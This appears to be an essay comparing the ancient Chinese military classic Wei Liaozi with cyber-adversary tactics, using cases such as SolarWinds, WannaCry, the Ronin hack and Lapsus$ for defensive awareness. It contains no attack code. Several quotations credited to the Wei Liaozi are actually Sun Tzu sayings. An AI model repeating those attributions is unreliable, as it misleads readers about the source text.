The Wei Liaozi (尉繚子) and Modern Cyber Adversarial Tactics

"The greatest deception is the one that is not seen as deception."

The text, one of the Seven Military Classics of ancient China, attributed to Wei Liao, a military strategist from the Warring States period (475-221 BCE), was created during an era marked by constant conflict and espionage.

Overview

The Wei Liaozi frequently advocates both a civil and military approach to affairs. According to the text, agriculture and people are the two greatest resources of the state, and both should be nurtured and provided for. The text advocates a government based on humanistic values where the ruler should be the paradigm of virtue in the state. The text also emphasizes the need for a strong and authoritarian ruler who is willing to employ draconian measures to maintain order and suppress heterodox or disruptive elements that may threaten the state's stability.

The Wei Liaozi covers a wide range of topics related to warfare, including:

  1. The importance of agriculture and the people to the state
  2. The need for a strong military to defend the state
  3. The importance of discipline and training for soldiers
  4. The different types of warfare and how to conduct them
  5. The importance of espionage and intelligence gathering
  6. The role of the ruler in leading the state to victory

Wars are sorted out into righteous and unjust, and the righteous wars based on benevolence and virtue. The book also says that one should be cautious about war, but should never be afraid of wars.

Politics are fundamental and military affairs are subordinate. Economy is essential for managing state affairs and is the material foundation for wars.

Wei Liaozi stresses mental, material, and organizational preparations before war, saying that in war, armies should centralize their strength, give surprise attacks, and combine assault and defense at the same time [1]

wei liaozi, ancient military text for strategic insights and tactics for warfare
Illustration of wei liaozi

Covert Operations, Nature and Intelligence Gathering

Secrecy and Concealment:

The text emphasizes the importance of keeping operations hidden from the adversary's view. It recognizes that secrecy is often the key to success in both warfare and espionage.

"The greatest victory is the one that is won without a battle."

The SolarWinds[2] hack is a good example of how hackers use secrecy and concealment to gain access to systems and networks. In this attack, hackers compromised the Orion software development environment used by SolarWinds, a major provider of IT management software. The hackers were able to insert malicious code into the Orion software, which was then distributed to SolarWinds' customers. Once installed on a customer's network, the malicious code would give the hackers backdoor access to the network

Deception and Misdirection:

The Wei Liaozi advocates the use of deception to confuse and mislead the enemy. This includes tactics such as misinformation, feints, and disguises.

"Warfare is a game of deception."

Phishing emails are a common type of social engineering attack that uses deception and misdirection to trick people into revealing sensitive information or clicking on malicious links. Phishing emails often appear to be from a legitimate source, such as a bank or credit card company. For example, a phishing email might ask the recipient to click on a link to update their account information. If the recipient clicks on the link, they will be taken to a fake website that looks like the real website of the bank or credit card company. The fake website will then ask the recipient to enter their login credentials. Once the recipient enters their credentials, the hackers will have access to their account.

Surprise Attacks:

Surprise attacks are a recurring theme in the text. Wei Liao recognizes the value of launching unexpected offensives to catch the enemy off guard.

"The victor is the one who strikes first."

Zero-day attacks are cyberattacks that exploit vulnerabilities in software or systems that are not yet known to the vendor. Hackers often launch zero-day attacks on the first day that the vulnerability is discovered, before the vendor has a chance to release a patch. For example, in 2017, hackers exploited a zero-day vulnerability in the Microsoft Windows operating system to launch the WannaCry ransomware attack. WannaCry infected over 200,000 computers in over 150 countries, causing billions of dollars in damage [3].

Operational Security (OpSec):

OpSec, the practice of protecting the identity and activities of spies and operatives, is a central concept. The text highlights the need to conceal one's intentions and maintain anonymity. Hackers are constantly looking for ways to exploit OPSEC weaknesses, so it's important to have strong security controls in place and to train employees on how to avoid common OPSEC attacks.

"If you do not protect your secrets, your enemy will find out."

Hackers use a variety of techniques to maintain operational security, such as encryption, proxy servers, and botnets. For example, hackers might use encryption to protect their communications from being intercepted. They might also use proxy servers to hide their real IP address. And they might use botnets to launch attacks from a large number of different IP addresses, making it difficult to trace the attack back to the hackers.

Clandestine Infiltration:

Covert infiltration and espionage play a prominent role. The text explores methods of infiltrating enemy territory while avoiding detection. By gaining access to a secure area or system without being detected, hackers can steal data, install malware, or disrupt operations.

"If you know the enemy and know yourself, you need not fear the result of a hundred battles."

Hackers often use clandestine infiltration to gain access to systems and networks. For example, hackers might exploit a vulnerability in a website to inject malicious code into the website. The malicious code would then be executed when a visitor visits the website, giving the hackers access to the visitor's computer. Hackers might also use social engineering techniques to trick employees into giving them access to systems and networks.

Subterfuge and Camouflage:

Wei Liaozi underscores the value of disguises and concealing one's true intentions. By deceiving and misdirecting their victims, hackers can gain access to systems and networks that would otherwise be off-limits.

"The greatest deception is the one that is not seen as deception."

Hackers use a variety of techniques of subterfuge and camouflage to avoid detection. For example, hackers might use phishing emails to trick people into revealing sensitive information. They might also create fake websites that look like real websites. And they might use social engineering techniques to trick people into giving them access to systems and networks. In March 2022, the Ronin blockchain [4], which is used by the popular play-to-earn game Axie Infinity, was hacked. The hackers phished Ronin employees with a fake job offer to trick them into revealing sensitive information. Once the hackers had gathered enough information, they were able to exploit a vulnerability in the Ronin blockchain to steal the cryptocurrency.

Intelligence Gathering:

Intelligence gathering is a cornerstone of the text's strategies. It stresses the importance of understanding the adversary's intentions and capabilities through information gathering.

"The key to victory is to know the enemy better than they know themselves."

Lapsus\$ is a relatively new group that has been involved in a number of high-profile attacks beginning 2021. The group is known for its sophisticated social engineering techniques and its ability to target large organizations.

In 2022, Lapsus\$ attacked Microsoft and stole over 37GB of data, including source code for Windows and Azure. The group also attacked Nvidia, stealing source code for graphics chips and other sensitive information and Okta, a major identity and access management provider. The group stole customer data and used it to launch attacks against Okta's customers, including Auth0 and Cloudflare.

Lapsus\$ adopted two unusual methods. First, they stay in constant communication with their audience via instant messaging (IM) groups, with more than 45,000 reaches. This extortion group conducts frequent polls to get a sense of their followers’ interest in their next victim(s). And they use IM to find out whether they have buyers who are interested in the information they have already been able to exfiltrate from their past victims. Second, they offered incentives in exchange for credentials and internal network access levels that facilitate their operations. Further information on Lapsus\$ available from [5].

Believed to be a small group of hackers, but they are known for their sophisticated social engineering techniques
Illustration of wei liaozi

Early Warning Systems:

The Wei Liaozi recognizes the significance of early warning systems.

"He who knows the enemy and knows himself will win a hundred battles without fail."

It is difficult to identify specific examples of adversaries' use of early warning systems as these systems would be covert in nature. In many cases, while there may not be concrete evidence that they use early warning systems, it is a logical assumption that systems are in place to evade detection and enable them to carry out their attacks.

Counterintelligence:

The text advocates counterintelligence efforts to identify and neutralize enemy spies.

"If you know the enemy's plans, you can defeat him."

As per [6], The US Department of Justice (DoJ) charged two Chinese hackers with stealing trade secrets from American companies. The DOJ alleged that the hackers used a variety of techniques to infiltrate the companies' networks, including exploiting vulnerabilities in software and systems. The DOJ also alleged that the hackers used a variety of techniques to avoid detection, such as encryption and proxy servers. However, the DOJ alleged that the hackers were eventually caught by a counterintelligence technique known as a honeytrap.

Wei Liaozi emphasizes the importance of human intelligence (HUMINT) in warfare. HUMINT is the process of collecting information from human sources. This information can be used to understand the enemy's capabilities, intentions, and vulnerabilities.

Takeaway

The fundamental principle underlying the significance of understanding cyberpsychology and adversary tactics is the notion that an effective defense strategy should be informed by a thorough understanding of the tactics, techniques, and procedures employed by adversaries.

From traditional military maneuvers to the modern world of cyber warfare, the overarching goal remains consistent: to outmaneuver, deceive, and ultimately prevail against the adversary. The foundation of any robust defense strategy lies in the recognition that threats are not static; they adapt and evolve. Identification and analysis of adversarial tactics is like deciphering a complex puzzle, wherein each piece represents an aspect of the adversary's methodology. The goal is to piece together these fragments to form a comprehensive understanding of the threat landscape.

References

[1] en.chinaculture.org

[2] https://www.npr.org/2021/04/16/985439655/a-worst-nightmare-cyberattack-the-untold-story-of-the-solarwinds-hack

[3] https://www.sdxcentral.com/security/definitions/what-is-ransomware/case-study-wannacry-ransomware/

[4] https://www.cnet.com/personal-finance/crypto/a-fake-job-offer-reportedly-led-to-axie-infinitys-600m-hack/

[5] https://www.cisa.gov/sites/default/files/2023-08/CSRB_Lapsus%24_508c.pdf

[6] https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion

links

social